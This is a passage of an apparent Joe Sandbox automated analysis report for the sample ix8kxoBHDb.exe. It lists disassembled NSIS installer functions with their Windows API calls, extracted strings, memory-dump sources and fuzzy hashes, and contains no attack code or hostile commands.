Function 73B010E1 Relevance: 5.1, APIs: 4, Instructions: 104memoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?), ref: 73B0116A
GlobalFree.KERNEL32(00000000), ref: 73B011C7
GlobalFree.KERNEL32(00000000), ref: 73B011D9
GlobalFree.KERNEL32(?), ref: 73B01203

Memory Dump Source

Source File: 00000000.00000002.1483517567.0000000073B01000.00000020.00000001.01000000.00000005.sdmp, Offset: 73B00000, based on PE: true

Associated: 00000000.00000002.1483495722.0000000073B00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1483809646.0000000073B04000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1483843847.0000000073B06000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_73b00000_ix8kxoBHDb.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: a5338ffd82d24a5ec7347f6daccffa31fec6e5f3fbf12c52d9e140c38dc3f7f0
Instruction ID: 132b35488d811e11401d52fefadda27c1487afb43c7dff7b5382fec132868727
Opcode Fuzzy Hash: a5338ffd82d24a5ec7347f6daccffa31fec6e5f3fbf12c52d9e140c38dc3f7f0
Instruction Fuzzy Hash: 0331B4FAA042059FE7189F66CB84B297FFCFB94314B14413AE94AD7A54F734D8018B60

Function 00405E43 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E53
lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405E6B
CharNextA.USER32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E7C
lstrlenA.KERNEL32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E85

Memory Dump Source

Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 7e71a0af936693ae9f9191b5a8beeb80aa55241a483ed2e2c495a4152d25f7df
Instruction ID: 3eb9f18af2c16f81f4dc7877ab3147293eaebe45f2d41041cd024b5e05e36bdf
Opcode Fuzzy Hash: 7e71a0af936693ae9f9191b5a8beeb80aa55241a483ed2e2c495a4152d25f7df
Instruction Fuzzy Hash: 4AF0C831100514AFC7029B94DD4099FBBA8DF06354B25407AE844FB211D634DF01AB98

Analysis Process: ix8kxoBHDb.exePID: 7876, Parent PID: 7692COMMON

Non-executed Functions

Function 004034A5 Relevance: 75.7, APIs: 32, Strings: 11, Instructions: 410stringfilecomCOMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32 ref: 004034C8
GetVersion.KERNEL32 ref: 004034CE
lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403501
#17.COMCTL32(?,00000006,00000008,0000000A), ref: 0040353E
OleInitialize.OLE32(00000000), ref: 00403545
SHGetFileInfoW.SHELL32(004216E8,00000000,?,000002B4,00000000), ref: 00403561
GetCommandLineW.KERNEL32(00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 00403576
CharNextW.USER32(00000000,00435000,00000020,00435000,00000000,?,00000006,00000008,0000000A), ref: 004035AE

Part of subcall function 004067C2: GetModuleHandleA.KERNEL32(?,00000020,?,00403517,0000000A), ref: 004067D4
Part of subcall function 004067C2: GetProcAddress.KERNEL32(00000000,?), ref: 004067EF

GetTempPathW.KERNEL32(00000400,00437800,?,00000006,00000008,0000000A), ref: 004036E8
GetWindowsDirectoryW.KERNEL32(00437800,000003FB,?,00000006,00000008,0000000A), ref: 004036F9
lstrcatW.KERNEL32(00437800,\Temp,?,00000006,00000008,0000000A), ref: 00403705
GetTempPathW.KERNEL32(000003FC,00437800,00437800,\Temp,?,00000006,00000008,0000000A), ref: 00403719
lstrcatW.KERNEL32(00437800,Low,?,00000006,00000008,0000000A), ref: 00403721
SetEnvironmentVariableW.KERNEL32(TEMP,00437800,00437800,Low,?,00000006,00000008,0000000A), ref: 00403732
SetEnvironmentVariableW.KERNEL32(TMP,00437800,?,00000006,00000008,0000000A), ref: 0040373A
DeleteFileW.KERNEL32(00437000,?,00000006,00000008,0000000A), ref: 0040374E

Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00000400,00403576,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5

OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 00403819
ExitProcess.KERNEL32 ref: 0040383A
lstrcatW.KERNEL32(00437800,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 0040384D
lstrcatW.KERNEL32(00437800,0040A328,00437800,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 0040385C
lstrcatW.KERNEL32(00437800,.tmp,00437800,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 00403867
lstrcmpiW.KERNEL32(00437800,00436800,00437800,.tmp,00437800,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 00403873
SetCurrentDirectoryW.KERNEL32(00437800,00437800,?,00000006,00000008,0000000A), ref: 0040388F
DeleteFileW.KERNEL32(00420EE8,00420EE8,?,0042B000,00000008,?,00000006,00000008,0000000A), ref: 004038E9
CopyFileW.KERNEL32(00438800,00420EE8,00000001,?,00000006,00000008,0000000A), ref: 004038FD
CloseHandle.KERNEL32(00000000,00420EE8,00420EE8,?,00420EE8,00000000,?,00000006,00000008,0000000A), ref: 0040392A
GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 00403959
OpenProcessToken.ADVAPI32(00000000), ref: 00403960
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403975
AdjustTokenPrivileges.ADVAPI32 ref: 00403998
ExitWindowsEx.USER32(00000002,80040002), ref: 004039BD
ExitProcess.KERNEL32 ref: 004039E0

Strings

SeShutdownPrivilege, xrefs: 0040396F
~nsu, xrefs: 00403845
Error launching installer, xrefs: 004037D0
Error writing temporary file. Make sure your temp folder is valid., xrefs: 004034BC
TMP, xrefs: 00403735
\Temp, xrefs: 004036FF
NSIS Error, xrefs: 00403567
UXTHEME, xrefs: 004034F5, 004034FA, 00403500
TEMP, xrefs: 0040372D
Low, xrefs: 0040371B
.tmp, xrefs: 00403861

Memory Dump Source

Source File: 00000002.00000002.3772010021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3771983133.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3772041979.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3772071790.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3772106931.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ix8kxoBHDb.jbxd

Similarity

API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
String ID: .tmp$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
API String ID: 3441113951-334447862
Opcode ID: 05e616f99306ff785708979dde1941866962e16d7e4638c2318d7513fcce5d93
Instruction ID: dafc1af32610b20ef8647c0cf6a3faef20d76686829591872cbc6ab955e55f97
Opcode Fuzzy Hash: 05e616f99306ff785708979dde1941866962e16d7e4638c2318d7513fcce5d93
Instruction Fuzzy Hash: 4DD1F571600310ABE7206F759D49A3B3AECEB4070AF50443FF981B62D2DB7D8956876E

Function 00404DCC Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404DE4
GetDlgItem.USER32(?,00000408), ref: 00404DEF
GlobalAlloc.KERNEL32(00000040,?), ref: 00404E39
LoadBitmapW.USER32(0000006E), ref: 00404E4C
SetWindowLongW.USER32(?,000000FC,004053C4), ref: 00404E65
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404E79
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404E8B
SendMessageW.USER32(?,00001109,00000002), ref: 00404EA1
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404EAD
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404EBF
DeleteObject.GDI32(00000000), ref: 00404EC2
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404EED
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404EF9
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404F8F
SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404FBA
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404FCE
GetWindowLongW.USER32(?,000000F0), ref: 00404FFD
SetWindowLongW.USER32(?,000000F0,00000000), ref: 0040500B
ShowWindow.USER32(?,00000005), ref: 0040501C
SendMessageW.USER32(?,00000419,00000000,?), ref: 00405119
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040517E
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405193
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004051B7
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004051D7
ImageList_Destroy.COMCTL32(?), ref: 004051EC
GlobalFree.KERNEL32(?), ref: 004051FC
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405275
SendMessageW.USER32(?,00001102,?,?), ref: 0040531E
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040532D
InvalidateRect.USER32(?,00000000,00000001), ref: 0040534D
ShowWindow.USER32(?,00000000), ref: 0040539B
GetDlgItem.USER32(?,000003FE), ref: 004053A6
ShowWindow.USER32(00000000), ref: 004053AD

Strings

, xrefs: 00405385
N, xrefs: 00405057
M, xrefs: 00404F76

Memory Dump Source

Source File: 00000002.00000002.3772010021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3771983133.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3772041979.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3772071790.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3772106931.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ix8kxoBHDb.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 1638840714-813528018
Opcode ID: 31df49881469a5ecb160dedc783b3d99a93962993771a60ee7fc946c0ea1256b
Instruction ID: 7f687e55a7f93217ddba54fde82f382d197ef8b4c31ab339cf60f2545021b201
Opcode Fuzzy Hash: 31df49881469a5ecb160dedc783b3d99a93962993771a60ee7fc946c0ea1256b
Instruction Fuzzy Hash: DD028DB0A00609EFDF209F94CD85AAE7BB5FB44354F10807AE611BA2E0C7798D52CF58

Function 00405AFA Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 148filestringCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,?,00437800,756F2EE0,00000000), ref: 00405B23
lstrcatW.KERNEL32(00425730,\*.*,00425730,?,?,00437800,756F2EE0,00000000), ref: 00405B6B
lstrcatW.KERNEL32(?,0040A014,?,00425730,?,?,00437800,756F2EE0,00000000), ref: 00405B8E
lstrlenW.KERNEL32(?,?,0040A014,?,00425730,?,?,00437800,756F2EE0,00000000), ref: 00405B94
FindFirstFileW.KERNEL32(00425730,?,?,?,0040A014,?,00425730,?,?,00437800,756F2EE0,00000000), ref: 00405BA4
FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405C44
FindClose.KERNEL32(00000000), ref: 00405C53

Strings

0WB, xrefs: 00405B53
\*.*, xrefs: 00405B65

Memory Dump Source

Source File: 00000002.00000002.3772010021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3771983133.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3772041979.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3772071790.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3772106931.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ix8kxoBHDb.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: 0WB$\*.*
API String ID: 2035342205-351390296
Opcode ID: c39e99c88a1dbfea07cbdfee3447eb09e3b7895857f1840ffe404f3b8fee67f3
Instruction ID: 490a569b50011677cd34e026f6ab1003dec3a9533e419df12a6715eb2ed0bc70
Opcode Fuzzy Hash: c39e99c88a1dbfea07cbdfee3447eb09e3b7895857f1840ffe404f3b8fee67f3
Instruction Fuzzy Hash: 0541BF30805B18A6EB31AB618D89BAF7678EF41718F10817BF801711D2D77C59C29EAE

Function 00406AF2 Relevance: 5.4, APIs: 4, Instructions: 382COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3772010021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3771983133.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3772041979.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3772071790.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3772106931.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ix8kxoBHDb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35cbb8abcdf375330cdaaed117d7ae66e2d52f36901990e867650d9b3411c4d0
Instruction ID: 8a3521d6a9ab1c5b5eb45e3d7957e6eefdd785676f1866d9874d60d9aff9e69c
Opcode Fuzzy Hash: 35cbb8abcdf375330cdaaed117d7ae66e2d52f36901990e867650d9b3411c4d0
Instruction Fuzzy Hash: 1CF16770D04229CBDF18CFA8C8946ADBBB0FF45305F25816ED856BB281D7386A86DF45

Function 0040672B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00437800,00426778,00425F30,00405E0E,00425F30,00425F30,00000000,00425F30,00425F30,00437800,?,756F2EE0,00405B1A,?,00437800,756F2EE0), ref: 00406736
FindClose.KERNEL32(00000000), ref: 00406742

Strings

xgB, xrefs: 0040672C

Memory Dump Source

Source File: 00000002.00000002.3772010021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3771983133.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3772041979.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3772071790.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3772106931.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ix8kxoBHDb.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: xgB
API String ID: 2295610775-399326502
Opcode ID: 8f8798618dbeb96281b7e152f222c6bef4cfc1fb78c0b92afc6d3f182eb863fd
Instruction ID: 964bfaba6fe47efa91ae3b9d04416f3a0311ddb8c2b0a677c8b566ff70b98767
Opcode Fuzzy Hash: 8f8798618dbeb96281b7e152f222c6bef4cfc1fb78c0b92afc6d3f182eb863fd
Instruction Fuzzy Hash: 08D012315150205BC2011738BD4C85B7A589F553357228B37B866F61E0C7348C62869C

Function 0040558F Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 284windowclipboardmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000403), ref: 004055ED
GetDlgItem.USER32(?,000003EE), ref: 004055FC
GetClientRect.USER32(?,?), ref: 00405639
GetSystemMetrics.USER32(00000002), ref: 00405640
SendMessageW.USER32(?,00001061,00000000,?), ref: 00405661
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405672
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405685
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405693
SendMessageW.USER32(?,00001024,00000000,?), ref: 004056A6
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004056C8
ShowWindow.USER32(?,00000008), ref: 004056DC
GetDlgItem.USER32(?,000003EC), ref: 004056FD
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040570D
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405726
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405732
GetDlgItem.USER32(?,000003F8), ref: 0040560B

Part of subcall function 00404394: SendMessageW.USER32(00000028,?,00000001,004041BF), ref: 004043A2

GetDlgItem.USER32(?,000003EC), ref: 0040574F
CreateThread.KERNEL32(00000000,00000000,Function_00005523,00000000), ref: 0040575D
CloseHandle.KERNEL32(00000000), ref: 00405764
ShowWindow.USER32(00000000), ref: 00405788
ShowWindow.USER32(?,00000008), ref: 0040578D
ShowWindow.USER32(00000008), ref: 004057D7
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040580B
CreatePopupMenu.USER32 ref: 0040581C
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405830
GetWindowRect.USER32(?,?), ref: 00405850
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405869
SendMessageW.USER32(?,00001073,00000000,?), ref: 004058A1
OpenClipboard.USER32(00000000), ref: 004058B1
EmptyClipboard.USER32 ref: 004058B7
GlobalAlloc.KERNEL32(00000042,00000000), ref: 004058C3
GlobalLock.KERNEL32(00000000), ref: 004058CD
SendMessageW.USER32(?,00001073,00000000,?), ref: 004058E1
GlobalUnlock.KERNEL32(00000000), ref: 00405901
SetClipboardData.USER32(0000000D,00000000), ref: 0040590C
CloseClipboard.USER32 ref: 00405912

Strings

{, xrefs: 004057F5
(7B, xrefs: 0040587D

Memory Dump Source

Source File: 00000002.00000002.3772010021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3771983133.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3772041979.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3772071790.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3772106931.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ix8kxoBHDb.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: (7B${
API String ID: 590372296-525222780
Opcode ID: f04ab8e6c053f28f703b7489d19dc379b83f29f3476edfbeb8782164aeb73afa
Instruction ID: ef9837d71be30d97cad1ad5ee6bf48d4101bac37d77d0ad6e239d9f51a57dc01
Opcode Fuzzy Hash: f04ab8e6c053f28f703b7489d19dc379b83f29f3476edfbeb8782164aeb73afa
Instruction Fuzzy Hash: C4B16A70900608FFDB11AFA0DD85AAE7B79FB48355F00403AFA45B61A0CB754E52DF68

Function 00403E86 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 346windowstringCOMMON

Download Yara Rule

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403EC2
ShowWindow.USER32(?), ref: 00403EDF
DestroyWindow.USER32 ref: 00403EF3
SetWindowLongW.USER32(?,00000000,00000000), ref: 00403F0F
GetDlgItem.USER32(?,?), ref: 00403F30
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403F44
IsWindowEnabled.USER32(00000000), ref: 00403F4B
GetDlgItem.USER32(?,00000001), ref: 00403FF9
GetDlgItem.USER32(?,00000002), ref: 00404003
SetClassLongW.USER32(?,000000F2,?), ref: 0040401D
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040406E
GetDlgItem.USER32(?,00000003), ref: 00404114
ShowWindow.USER32(00000000,?), ref: 00404135
EnableWindow.USER32(?,?), ref: 00404147
EnableWindow.USER32(?,?), ref: 00404162
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00404178
EnableMenuItem.USER32(00000000), ref: 0040417F
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404197
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004041AA
lstrlenW.KERNEL32(00423728,?,00423728,00000000), ref: 004041D4
SetWindowTextW.USER32(?,00423728), ref: 004041E8
ShowWindow.USER32(?,0000000A), ref: 0040431C

Strings

(7B, xrefs: 004041C4

Memory Dump Source

Source File: 00000002.00000002.3772010021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3771983133.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3772041979.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3772071790.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3772106931.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ix8kxoBHDb.jbxd

Similarity

API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
String ID: (7B
API String ID: 184305955-3251261122
Opcode ID: 030bf1c90a5d59ce14a62ff8eb631d2412c8a49503263f6ef8a14511ced3c4f7
Instruction ID: 1e1a27d6975204c591228116fe5edee23a209105d2649c04e919f1d7e5095d09
Opcode Fuzzy Hash: 030bf1c90a5d59ce14a62ff8eb631d2412c8a49503263f6ef8a14511ced3c4f7
Instruction Fuzzy Hash: 6FC1A2B1644200FBDB216F61EE85D2A3BB8EB94706F40053EFA41B11F1CB7958529B6D

Function 00403AD8 Relevance: 38.7, APIs: 13, Strings: 9, Instructions: 215stringregistryCOMMON

Download Yara Rule

APIs

Part of subcall function 004067C2: GetModuleHandleA.KERNEL32(?,00000020,?,00403517,0000000A), ref: 004067D4
Part of subcall function 004067C2: GetProcAddress.KERNEL32(00000000,?), ref: 004067EF

lstrcatW.KERNEL32(00437000,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,00437800,756F3420,00435000,00000000), ref: 00403B59
lstrlenW.KERNEL32(004281E0,?,?,?,004281E0,00000000,00435800,00437000,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,00437800), ref: 00403BD9
lstrcmpiW.KERNEL32(004281D8,.exe,004281E0,?,?,?,004281E0,00000000,00435800,00437000,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000), ref: 00403BEC
GetFileAttributesW.KERNEL32(004281E0), ref: 00403BF7
LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,00435800), ref: 00403C40

Part of subcall function 0040632F: wsprintfW.USER32 ref: 0040633C

RegisterClassW.USER32(004291E0), ref: 00403C7D
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403C95
CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403CCA
ShowWindow.USER32(00000005,00000000), ref: 00403D00
GetClassInfoW.USER32(00000000,RichEdit20W,004291E0), ref: 00403D2C
GetClassInfoW.USER32(00000000,RichEdit,004291E0), ref: 00403D39
RegisterClassW.USER32(004291E0), ref: 00403D42
DialogBoxParamW.USER32(?,00000000,00403E86,00000000), ref: 00403D61

Strings

Control Panel\Desktop\ResourceLocale, xrefs: 00403B0C
.DEFAULT\Control Panel\International, xrefs: 00403B44
(7B, xrefs: 00403B04
RichEdit, xrefs: 00403D33
RichEdit20W, xrefs: 00403D24, 00403D2A
RichEd32, xrefs: 00403D14
_Nb, xrefs: 00403C5C, 00403CC4
RichEd20, xrefs: 00403D06
.exe, xrefs: 00403BE6

Memory Dump Source

Source File: 00000002.00000002.3772010021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3771983133.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3772041979.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3772071790.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3772106931.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ix8kxoBHDb.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: (7B$.DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
API String ID: 1975747703-1425696872
Opcode ID: fa642e9f5f159fa40c6df89367760cd7b58c30057714375835671963a1e6ccc9
Instruction ID: f49b718e50d7a26840138b6048ee10d29e8519d5aa43f5d66e73d4226ad9b376
Opcode Fuzzy Hash: fa642e9f5f159fa40c6df89367760cd7b58c30057714375835671963a1e6ccc9
Instruction Fuzzy Hash: FF61C470204700BBE220AF669E45F2B3A7CEB84B49F40447FF945B22E2DB7D5912C62D

Function 0040451E Relevance: 35.2, APIs: 19, Strings: 1, Instructions: 204windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004045BC
GetDlgItem.USER32(?,000003E8), ref: 004045D0
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004045ED
GetSysColor.USER32(?), ref: 004045FE
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 0040460C
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040461A
lstrlenW.KERNEL32(?), ref: 0040461F
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040462C
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404641
GetDlgItem.USER32(?,0000040A), ref: 0040469A
SendMessageW.USER32(00000000), ref: 004046A1
GetDlgItem.USER32(?,000003E8), ref: 004046CC
SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 0040470F
LoadCursorW.USER32(00000000,00007F02), ref: 0040471D
SetCursor.USER32(00000000), ref: 00404720
LoadCursorW.USER32(00000000,00007F00), ref: 00404739
SetCursor.USER32(00000000), ref: 0040473C
SendMessageW.USER32(00000111,00000001,00000000), ref: 0040476B
SendMessageW.USER32(00000010,00000000,00000000), ref: 0040477D

Strings

N, xrefs: 004046BA

Memory Dump Source

Source File: 00000002.00000002.3772010021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3771983133.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3772041979.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3772071790.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3772106931.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ix8kxoBHDb.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
String ID: N
API String ID: 3103080414-1130791706
Opcode ID: c2d943e7d3074a80d89972f065d7b0d6c6867904808fb573d17a53c74c23d30b
Instruction ID: 26ae409e5f73424340e4bb55f347a499eb46e427c8d4328441e026d38e95c6c2
